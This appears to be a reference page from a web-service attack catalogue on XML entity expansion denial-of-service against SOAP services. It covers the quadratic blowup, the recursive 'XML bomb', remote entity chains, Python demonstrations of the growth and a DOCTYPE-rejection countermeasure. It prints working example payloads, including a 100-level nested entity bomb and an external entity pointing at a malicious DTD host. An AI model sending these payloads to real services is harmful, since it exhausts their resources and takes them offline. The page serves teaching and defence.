XML Entity Expansion
The XML standard allows the use of DTDs (Document Type Definitions). DTDs are meant to define the expected structure of an XML document. One feature of DTDs is the ability to define entities. Entities are variables used to define shortcuts to strings or special characters. Typical examples of predefined entities are the entities used within HTML. In order to use the "<" or ">" character outside of HTML tags, they have to be replaced by their entities:
- the character ">" has the entity "&gt;"
- the character "<" has the entity "&lt;"
Entities that are not predefined can be declared internally or externally.
- internally declared - the entity is defined within the same document.
- externally declared - the entity is defined in an external document. Only the reference to the external document is given.
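To make entity substitution concrete, here is a minimal sketch using Python's standard `xml.etree.ElementTree` module, which expands internally declared entities while parsing. The document content and the entity name `author` are made up for illustration and do not come from a real service.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: one internally declared entity, referenced twice,
# plus the predefined entities &lt; and &gt;.
DOC = """<!DOCTYPE note [
  <!ENTITY author "Alice Example">
]>
<note>Written by &author;, checked by &author; &lt;twice&gt;.</note>"""


def expanded_text(document: str) -> str:
    """Parse the document and return the root element's text after entity expansion."""
    return ET.fromstring(document).text


if __name__ == "__main__":
    # Every reference is replaced by the declared value during parsing.
    print(expanded_text(DOC))
```

The parser replaces every reference with the declared value, so the application only ever sees the expanded text. This is the behaviour the attacks described here abuse.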
When included in a SOAP message, entities of DTDs can be used to mount attacks that limit the availability of a web service by draining system resources through the creation of large memory structures.
NOTE: Since SOAP Version 1.2, document type declarations (and therefore entity declarations) are not allowed within SOAP messages. However, many web services do not implement the standard correctly, which is why this attack is still viable. See the SOAP 1.2 specification for more details: "The XML infoset of a SOAP message MUST NOT contain a document type declaration information item."
NOTE: DOM-based parsers and streaming-based parsers are both susceptible to this type of attack, since this vulnerability does not target the parser itself. It aims at the XML validator that runs prior to the parser.
There are four attack subtypes:
- XML Generic Entity Expansion
  XML Generic Entity Expansion is the simplest attack. All the attacker has to do is declare an entity with overlong content and use the entity many times in the SOAP message. When the SOAP message is parsed, all entities are resolved, which exhausts the RAM of the attacked web service.
  As a rough estimate, the attack works when using the following parameters:
  - Length of string: more than 10^5 characters
  - Number of entity occurrences in the document: more than 30,000
  For more details, please refer to the work of Leroy Metin Yaylacioglu listed in the reference section.
  This attack is also known as the "Quadratic Blowup DoS Attack".
- XML Recursive Entity Expansion
  The basic idea behind this attack is the same as for the XML Generic Entity Expansion attack; however, the attack is a little more elegant. When successful, a relatively small SOAP message is expanded to a large memory structure which exhausts the application's RAM.
  Let's explain the attack based on an example:
  The attacker starts off by defining the entities x0 to x100 (101 entities in total). The entity x0 is assigned a fixed value. Each of the other entities, x1 through x100, contains two references to the previous entity as its value. For example, the value of the entity x50 is "&x49;&x49;". Later in the document, &x100; is used exactly once. This is sufficient to devastate the web service's availability, since the document grows exponentially. With every level of nesting the number of entity references doubles, resulting in 2^100 repetitions of the value of the entity x0.
  This attack is also known as "XML Bomb".
- XML Remote Entity Expansion
  When using the XML Remote Entity Expansion attack, an attacker defines an external entity that in turn points to another external entity, and so on. Before doing any further processing, the parser has to retrieve all external entity definitions. Depending on the web service load, this can use up all the remaining system resources of the web service and therefore render it unavailable.
- XML C14N Entity Expansion
  The attack works just like the attacks described above. The only difference is that the entities are resolved during the canonicalization process.
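The memory figures behind the first two subtypes can be worked out with simple arithmetic. The sketch below is a rough estimate that counts characters only and ignores any per-node overhead of the parser. The function names are made up for illustration, and the base value "ha!" (3 characters) is taken from Listing 2. For the nested variant, x1 yields 2 copies of x0, x2 yields 4, and in general xn yields 2^n copies.

```python
def generic_expansion_chars(entity_length: int, occurrences: int) -> int:
    """Characters produced when one entity of the given length is referenced `occurrences` times."""
    return entity_length * occurrences


def recursive_expansion_chars(base_length: int, levels: int) -> int:
    """Characters produced by one reference to x<levels>, where each of
    x1..x<levels> references its predecessor twice (2**levels copies of x0)."""
    return base_length * 2 ** levels


if __name__ == "__main__":
    # Generic expansion with the rough parameters quoted above.
    print(generic_expansion_chars(10**5, 30_000))  # 3000000000 characters
    # Nested expansion: x0 = "ha!" and a single reference to x100.
    print(recursive_expansion_chars(3, 100))
```

With the quoted parameters, the generic variant already yields about 3 * 10^9 characters. The nested variant yields 3 * 2^100 characters, which is far beyond any available memory.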
Prerequisites for attack
In order for this attack to work, the following prerequisites have to be met:
- The attacker knows the endpoint of the web service. A WSDL is not required, since the attack is solely focused on the XML parser. It does not matter whether the operations within the SOAP message are valid.
- The attacker can reach the endpoint from their location. Access to the attacked web service is required. If the web service is only available to users within a certain company network, the attack is limited to that network.
Graphical representation of attack
It is important to understand that DOM-based parsers and streaming-based parsers are equally susceptible to this attack, since the attack does not target the parser itself. It focuses on the XML validator that does its work prior to the parser.
- Red box = attacked web service component
- Black box = attacker location
- Blue box = other web service components not actively used in the attack
The following examples cover the first three attack subtypes:
Example 1: XML Generic Entity Expansion
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE s [
  <!ENTITY x "OVERLONG_CONTENT_HERE_WITH_MORE_THAN_10^5_CHARACTERS">
]>
<soapenv:Envelope xmlns:ns1="http://myPackageNamespace" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
  </soapenv:Header>
  <soapenv:Body>
    <ns1:reverse>
      <s>
        &x; &x; ...
        <!-- For a successful attack, it is recommended to repeat the entity more than 30,000 times -->
      </s>
    </ns1:reverse>
  </soapenv:Body>
</soapenv:Envelope>
Listing 1: XML Generic Entity Expansion
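The effect of Listing 1 can be observed safely at a much smaller scale. The following sketch builds a scaled-down document without the SOAP envelope and compares the size of the payload with the size of the parsed text. The function names and the small parameters are assumptions chosen for illustration. They are far below the values quoted above, so running the code is harmless.

```python
import xml.etree.ElementTree as ET


def build_generic_payload(entity_length: int, occurrences: int) -> str:
    """Build a scaled-down document: one long entity referenced many times."""
    value = "A" * entity_length
    references = "&x;" * occurrences
    return f'<!DOCTYPE s [<!ENTITY x "{value}">]><s>{references}</s>'


def measure(entity_length: int, occurrences: int) -> tuple[int, int]:
    """Return (payload size, expanded text size) in characters."""
    payload = build_generic_payload(entity_length, occurrences)
    expanded = ET.fromstring(payload).text
    return len(payload), len(expanded)


if __name__ == "__main__":
    payload_size, expanded_size = measure(1000, 200)
    print(payload_size, expanded_size)
```

The payload grows with the sum of the entity length and the number of references, while the expanded text grows with their product. This is the reason for the name "quadratic blowup".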
Example 2: XML Recursive Entity Expansion
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE s [
  <!ENTITY x0 "ha!">
  <!ENTITY x1 "&x0;&x0;">
  <!ENTITY x2 "&x1;&x1;">
  <!ENTITY x3 "&x2;&x2;">
  <!-- Entities from x4 to x98... -->
  <!ENTITY x99 "&x98;&x98;">
  <!ENTITY x100 "&x99;&x99;">
]>
<soapenv:Envelope xmlns:soapenv="..." xmlns:ns1="...">
  <soapenv:Header>
  </soapenv:Header>
  <soapenv:Body>
    <ns1:reverse>
      <s>&x100;</s>
    </ns1:reverse>
  </soapenv:Body>
</soapenv:Envelope>
Listing 2: XML Recursive Entity Expansion
Example 3: XML Remote Entity Expansion
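The doubling in Listing 2 can be checked with a deliberately tiny nesting depth. The sketch below generates the entity declarations programmatically, omitting the SOAP envelope, and measures the expanded text. The function names are hypothetical, and the depth must be kept small: each additional level doubles the output, so a depth of 30 would already produce about 3 GB of text.

```python
import xml.etree.ElementTree as ET


def build_nested_payload(levels: int, base: str = "ha!") -> str:
    """Build a document with entities x0..x<levels>, each referencing its predecessor twice."""
    declarations = [f'<!ENTITY x0 "{base}">']
    for i in range(1, levels + 1):
        declarations.append(f'<!ENTITY x{i} "&x{i - 1};&x{i - 1};">')
    dtd = "".join(declarations)
    return f"<!DOCTYPE s [{dtd}]><s>&x{levels};</s>"


def expanded_length(levels: int) -> int:
    """Parse the generated document and return the length of the expanded text."""
    return len(ET.fromstring(build_nested_payload(levels)).text)


if __name__ == "__main__":
    # Keep the depth small: every extra level doubles the result.
    for depth in (1, 4, 10):
        print(depth, expanded_length(depth))
```

For a nesting depth of n, the expanded text has 3 * 2^n characters, while the document itself grows only linearly with n.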
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE s [
  <!ENTITY attack SYSTEM "http://www.ws-attacks.org/malicious_entities.dtd">
  <!-- http://www.ws-attacks.org/malicious_entities.dtd points to a DTD that in turn also contains external entity definitions -->
]>
<soapenv:Envelope xmlns:ns1="http://myPackageNamespace" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
  </soapenv:Header>
  <soapenv:Body>
    <ns1:reverse>
      <s>&attack;</s>
    </ns1:reverse>
  </soapenv:Body>
</soapenv:Envelope>
Listing 3: XML Remote Entity Expansion
Attack mitigation / countermeasures
If you are sure that your web service framework implements the SOAP 1.2 standard correctly, you are not vulnerable to any of these attacks. If you are not sure, the easiest and most straightforward countermeasure is to check, prior to parsing, whether the message contains an opening DTD tag (<!DOCTYPE). If it does, simply discard the message.
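One possible way to realise such a check is sketched below. Instead of scanning the raw bytes for "<!DOCTYPE", this variant runs the message through Python's standard `xml.parsers.expat` module with a handler that aborts as soon as a document type declaration starts, which is before any entity declaration is processed. The names `DoctypeForbidden` and `reject_if_doctype` are made up for this example. This is a sketch under these assumptions, not a hardened implementation.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a message contains a document type declaration."""


def reject_if_doctype(message: bytes) -> None:
    """Raise DoctypeForbidden if the message contains a DOCTYPE.

    Malformed XML still raises xml.parsers.expat.ExpatError.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called when the DOCTYPE begins; raising here stops the parse.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(message, True)


if __name__ == "__main__":
    reject_if_doctype(b"<s>harmless</s>")  # passes silently
    try:
        reject_if_doctype(b'<!DOCTYPE s [<!ENTITY x "y">]><s>&x;</s>')
    except DoctypeForbidden as error:
        print("discarded:", error)
```

A message that passes this check can then be handed to the regular SOAP processing. A message that raises is discarded, as recommended above.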
Categorisation by violated security objective
The attack aims at exhausting system resources; it therefore violates the security objective Availability.
Categorisation by number of involved parties
Categorisation by attacked component in web service architecture
The first three attack subtypes are categorised as follows:
The last attack subtype - XML C14N Entity Expansion - is categorised as follows:
Categorisation by attack spreading
References
- Brad Hill. A taxonomy of attacks against XML digital signatures & encryption.
- Nishchal Bhalla and Sahba Kazerooni. Web services vulnerabilities. http://www.blackhat.com/presentations/bh-europe-07/Bhalla-Kazerooni/Whitepaper/bh-eu-07-bhalla-WP.pdf, February 2007. Accessed 01 July 2010.
- Leroy Metin Yaylacioglu. Business value einer web service firewall. Master’s thesis, Hochschule für Angewandte Wissenschaften Hamburg, 2008.